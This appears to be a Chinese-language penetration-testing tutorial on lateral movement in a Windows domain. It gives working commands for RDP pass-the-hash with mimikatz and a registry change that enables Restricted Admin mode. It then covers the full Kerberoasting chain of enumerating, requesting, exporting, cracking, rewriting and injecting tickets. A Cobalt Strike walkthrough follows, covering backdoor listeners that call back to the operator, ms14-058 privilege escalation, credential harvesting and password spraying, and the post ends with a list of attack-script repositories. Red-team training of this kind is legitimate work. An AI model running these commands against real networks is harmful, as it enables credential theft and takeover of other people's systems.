在这里插入图片描述
在这里插入图片描述

案例1-域横向移动RDP传递-Mimikatz

除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。

RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断

当得到密码时,如果对方开启了3389端口,可以直接进行连接并登陆

RDP明文密码链接
1.windows: mstsc
2.mstsc.exe /console /v:192.168.3.21 /admin
3.linux: rdesktop 192.168.3.21:3389

RDP密文HASH链接
windows Server需要开启 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默认开启,
同时如果Win 7 和Windows Server 2008 R2安装了28719972973351补丁也支持;

开启命令:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

开启后运行:
1.mstsc.exe /restrictedadmin
2.mimikatz.exe
3.privilege::debug
4.sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"

案例2-域横向移动SPN服务-探针,请求,导出,破解,重写

1探针
setspn -q */*
setspn -q */* | findstr "MSSQL"

2请求票据
# 删除缓存票据
klist purge

# powershell请求
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"

# mimikatz请求
mimikatz.exe "kerberos::ask /target:xxxx"

# 查看票据
klist

3导出票据
# mimikatz
mimikatz.exe "kerberos::list /export"

4破解票据
# 破解工具tgsrepcrack.py python3环境运行
python tgsrepcrack.py passwd.txt xxxx.kirbi
python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerry@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi

5重写票据
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存

6利用
dir //xxx.xxx.xxx.xxx/c$

查看域内所有SPN服务列表
在这里插入图片描述
查看域内指定的spn服务
在这里插入图片描述

案例3-域横向移动测试流程一把梭哈-CobaltStrike初体验

1.关于启动及配置讲解

linux上需配置java环境才可启动
在这里插入图片描述
linux上启动后,本地打开bat文件
输入linux的ip以及设置的密码即可连接打开
在这里插入图片描述
因为这是一个团队工具,可以多人去连接linux上的CobaltStrike
可以通过配置监听器来区分自己与别人攻击的目标

在这里插入图片描述
在这里插入图片描述HTTP Hosts为生成的后门执行后回弹的ip,保存后即对设置的ip进行监听

在这里插入图片描述
生成后门
在这里插入图片描述
将生成的后门与监听器绑定,当这个后门触发后,绑定的对应监听器就会上线
在这里插入图片描述
将后门上传到目标主机并执行,执行后这里显示目标已经上线
在这里插入图片描述
进入命令终端
在这里插入图片描述
2.关于提权及插件加载

提权
在这里插入图片描述
打开后,自带的插件只有两个

在这里插入图片描述
可手动导入插件
在这里插入图片描述
选择插件目录中的cna文件
在这里插入图片描述
选中插件,点击upload加载
在这里插入图片描述
重新打开,选择相应的exp进行攻击
在这里插入图片描述
选择对应的监听器,攻击成功后进行回弹

在这里插入图片描述
点击后,就会用ms14-058对目标主机进行攻击
在这里插入图片描述
如果速度过慢的话,这里把sleep设置为1或者0
在这里插入图片描述
此时图标上多了一个连接的用户为system,证明已经提权成功
可以打开命令窗口执行命令
在这里插入图片描述
3.关于信息收集命令讲解

通过命令net view探针当前的网络环境
在这里插入图片描述
可以通过targets查看,查看当前所有探针的信息,非常方便
在这里插入图片描述
在这里插入图片描述
net dclist获取当前域控主机信息
在这里插入图片描述
shell net user /domain
调用cmd去执行net use /domain命令,获取域内所有用户名称
在这里插入图片描述
将mimikatz上传后,可直接通过CobaltStrike去执行
在这里插入图片描述
执行完后可通过此处直接查看mimikatz收集的信息
在这里插入图片描述在这里插入图片描述
对192.168.3.32进行攻击
在这里插入图片描述
选择之前通过mimikatz获取的其他主机的口令密码尝试连接
Listener:选择监听器
Session:选择通过哪个主机的权限去连接攻击目标机
在这里插入图片描述
4.通过第三方工具

上面通过密码尝试连接时,总不能一个一个密码手动去尝试连接,所以可以借助第三方工具

将第三方工具文件上传到主机
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

CobaltStrike Aggressor 脚本合集(可以自行在GitHub搜索):

https://github.com/harleyQu1nn/AggressorScripts
https://github.com/Und3rf10w/Aggressor-scripts
https://github.com/001SPARTaN/aggressor_scripts
https://github.com/rasta-mouse/Aggressor-Script
https://github.com/threatexpress/aggressor-scripts
https://github.com/ramen0x3f/AggressorScripts
https://github.com/FortyNorthSecurity/AggressorAssessor
https://github.com/michalkoczwara/aggressor_scripts_collection
https://github.com/ars3n11/Aggressor-Scripts
https://github.com/gaudard/scripts/tree/master/red-team/aggressor
https://github.com/bluscreenofjeff/AggressorScripts
https://github.com/vysecurity/Aggressor-VYSEC
https://github.com/killswitch-GUI/CobaltStrike-ToolKit
https://github.com/rsmudge/ElevateKit (第三方提权攻击)
https://github.com/QAX-A-Team/CobaltStrike-Toolset
https://github.com/DeEpinGh0st/Erebus (Erebus CobaltStrike后渗透测试插件,持续更新)
https://github.com/branthale/CobaltStrikeCNA
https://github.com/pandasec888/taowu-cobalt-strike(仓库已关闭)
Logo

更多推荐